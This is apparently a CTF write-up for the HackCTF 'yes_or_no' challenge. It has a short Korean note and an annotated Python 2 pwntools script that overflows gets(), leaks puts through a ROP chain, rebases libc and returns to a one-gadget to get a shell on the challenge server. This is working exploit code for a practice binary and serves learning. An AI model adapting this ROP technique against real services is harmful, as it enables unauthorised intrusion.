gdb로 확인해보면
값을 넣고 gets 를 이용해 rop 를 진행하면 된다
# Exploit script for the HackCTF "yes_or_no" challenge, written with pwntools.
# Flow visible below: stack overflow through gets() -> ROP call to puts(puts@GOT)
# to leak a libc address -> return to main -> second overflow returning into libc.
# NOTE(review): the script targets Python 2 pwntools (generator `.next()` and
# str + bytes concatenation in the payloads are Python 2-only constructs).
# Root cause as far as this script shows: an unbounded gets() read (per the note
# above) plus fixed binary addresses (e.got/e.plt/e.sym are used as absolute
# values, so presumably the binary is built without PIE -- confirm with checksec);
# the libc leak is needed only because libc itself is randomized by ASLR.
from pwn import *
# Remote challenge endpoint as given on the page (challenge-specific host/port).
r = remote('ctf.j0n9hyun.xyz', 3009)
# The target binary and the libc shipped with the challenge; every libc offset
# below is valid only for this exact ./libc-2.27.so build.
e = ELF('./yes_or_no', checksec=False)
libc = ELF('./libc-2.27.so', checksec=False)
# Challenge-specific input that leads to the gets() call (see the note above);
# its meaning cannot be derived from this script alone.
r.sendline('9830400')
# Wait for the prompt that precedes the overflowing read.
r.recvuntil('me\n')
# Stage 1: 26 bytes of padding up to the saved return address (length found with
# gdb per the note above), followed by the ROP chain.
payload = 'A'*26
payload += p64(0x0400883)      # gadget address; presumably pop rdi; ret so the next qword becomes puts()'s argument -- confirm in the binary
payload += p64(e.got['puts'])  # argument: puts@GOT, which holds the resolved libc address of puts
payload += p64(e.plt['puts'])  # call puts() -> prints that libc address
payload += p64(e.sym['main'])  # return to main so the program can be overflowed a second time
r.sendline(payload)
# The leaked pointer arrives as 6 raw bytes; zero-pad to 8 bytes for u64().
leak = u64(r.recv(6)+ '\x00\x00')
# Rebase libc from the leaked puts address.
libc_base = leak - libc.sym['puts']
# `system` and `binsh` are computed but never used below: the final payload
# uses `oneshot` instead.
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()
# Hard-coded libc offset named `oneshot` by the author; it is tied to the
# shipped ./libc-2.27.so and must be re-derived if the libc differs.
oneshot = libc_base + 0x10a38c
# main has restarted: answer its first prompt the same way as before.
r.sendlineafter('~!\n', '9830400')
# Stage 2: same padding, this time returning directly to the libc address.
payload = 'A'*26
payload += p64(oneshot)
r.sendline(payload)
# Hand the connection over to the user.
r.interactive()